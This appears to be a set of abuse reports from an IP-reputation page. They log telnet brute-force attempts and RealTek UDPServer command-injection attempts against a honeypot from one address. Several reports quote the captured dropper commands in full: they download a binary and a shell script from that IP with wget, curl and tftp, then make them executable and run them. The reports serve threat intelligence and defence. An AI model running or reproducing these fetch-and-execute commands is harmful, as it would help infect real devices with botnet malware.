DATE:2023-04-29 17:08:35, IP:45.154.3.16, PORT:telnet Telnet brute force auth on honeypot server (ho ...
show moreDATE:2023-04-29 17:08:35, IP:45.154.3.16, PORT:telnet Telnet brute force auth on honeypot server (honey-neo-dc)
show less
Callback ip address in a 9034/udp RealTek UDPServer command injection attempt
orf;
cd /tmp;
rm ...
show moreCallback ip address in a 9034/udp RealTek UDPServer command injection attempt
orf;
cd /tmp;
rm -rf mpsl;
/bin/busybox wget http://45.154.3.16/mpsl;
chmod +x mpsl;
./mpsl adolf;
wget http://45.154.3.16/jack5tr.sh;
curl -O http://45.154.3.16/jack5tr.sh;
chmod 777 jack5tr.sh;
sh jack5tr.sh
show less
Used as callback ip address in RealTek UDPServer command injection attempt
orf;
cd /tmp;
...
show moreUsed as callback ip address in RealTek UDPServer command injection attempt
orf;
cd /tmp;
rm -rf mpsl;
/bin/busybox wget http://45.154.3.16/mpsl;
chmod +x mpsl;
./mpsl adolf;
wget http://45.154.3.16/jack5tr.sh;
curl -O http://45.154.3.16/jack5tr.sh;
chmod 777 jack5tr.sh;
sh jack5tr.sh
show less
DATE:2023-04-05 08:55:28, IP:45.154.3.16, PORT:telnet Telnet brute force auth on honeypot server (ho ...
show moreDATE:2023-04-05 08:55:28, IP:45.154.3.16, PORT:telnet Telnet brute force auth on honeypot server (honey-neo-dc)
show less
DATE:2023-04-01 08:02:58, IP:45.154.3.16, PORT:telnet Telnet brute force auth on honeypot server (ho ...
show moreDATE:2023-04-01 08:02:58, IP:45.154.3.16, PORT:telnet Telnet brute force auth on honeypot server (honey-neo-dc)
show less
Russian callback IP address in udp/9034 injection
orf;
cd /tmp; rm -rf mpsl;
/bin/busybox wget ...
show moreRussian callback IP address in udp/9034 injection
orf;
cd /tmp; rm -rf mpsl;
/bin/busybox wget http://45.154.3.16/jack5tr.sh;
curl -O http://45.154.3.16/jack5tr.sh;
chmod 777 jack5tr.sh;
sh jack5tr.sh;
tftp 45.154.3.16 -c get jack5tr.sh;
chmod 777 jack5tr.sh;
sh jack5tr.sh;
show less